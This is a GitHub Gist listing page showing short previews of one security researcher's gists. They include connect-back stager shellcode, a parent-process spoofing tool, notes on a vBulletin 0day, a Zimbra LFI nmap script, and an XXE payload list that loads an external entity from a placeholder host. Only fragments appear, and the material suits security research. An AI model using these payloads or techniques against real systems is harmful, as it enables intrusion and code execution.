John Troon JohnTroony

JohnTroony / fix_gef_on_gdb.sh
Created Jun 7, 2020
Install GEF-GDB Plugin with all commands working.
View fix_gef_on_gdb.sh
#!/bin/bash
#######################################################
# Install GEF-GDB Plugin with all commands working #
# John (Troon) Ombagi : @johntroony #
#######################################################
# Install unicorn, capstone (dependency package)
sudo apt update && sudo apt install -y build-essential python3 python3-dev python3-pip gdb libcapstone3 libcapstone-dev cmake
JohnTroony / reverse_stager_shellcode.asm
Last active Apr 26, 2021
x86 Shellcoding: PoC code for connect-back shellcode that fetches a second-stage shellcode and executes it.
View reverse_stager_shellcode.asm
; John (Troon) Ombagi
; Twitter/Github : @johntroony
global _start
section .text
_start:
; Create new stack frame
JohnTroony / reverse_staged_shellcode.c
Created Nov 25, 2019
Windows Shellcoding: PoC code for connect-back shellcode that fetches a second-stage shellcode and executes it.
View reverse_staged_shellcode.c
#include<stdio.h>
#include<winsock2.h>
//Winsock Library
#pragma comment(lib,"ws2_32.lib")
// John (Troon) Ombagi
// Twitter/Github : @johntroony
int main(int argc, char **argv){
View 2019_vbulletin_0day_info.txt
I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.
As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php
$serverData = array_merge($_GET, $_POST);
if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
$app = $this->application['handler'];
JohnTroony / perm_repeat.py
Last active Sep 27, 2019
Permutation of numbers with repeating.
View perm_repeat.py
#!/usr/bin/python
# John (Troon) Ombagi
# jayombagi@gmail.com
# PR(n, k) = n^k ----> Permutation with repetition.
import itertools
import sys
JohnTroony / terminator.config
Created Aug 9, 2019
custom config for terminator terminal on Kali Linux
View terminator.config
[global_config]
enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
[keybindings]
[profiles]
[[default]]
background_darkness = 0.83
background_type = transparent
cursor_color = "#aaaaaa"
show_titlebar = False
scrollback_infinite = True
View process_spoof.c
/* x86_64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000
typedef struct _STARTUPINFOEX {
STARTUPINFO StartupInfo;
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
View http-vuln-zimbra-lfi.nse
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
description = [[
A 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
The vulnerability is a local file inclusion that can retrieve any file from the server.
View escapetest.c
// Compile with -std=c11
#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>
#define MAX_STR_LEN 4095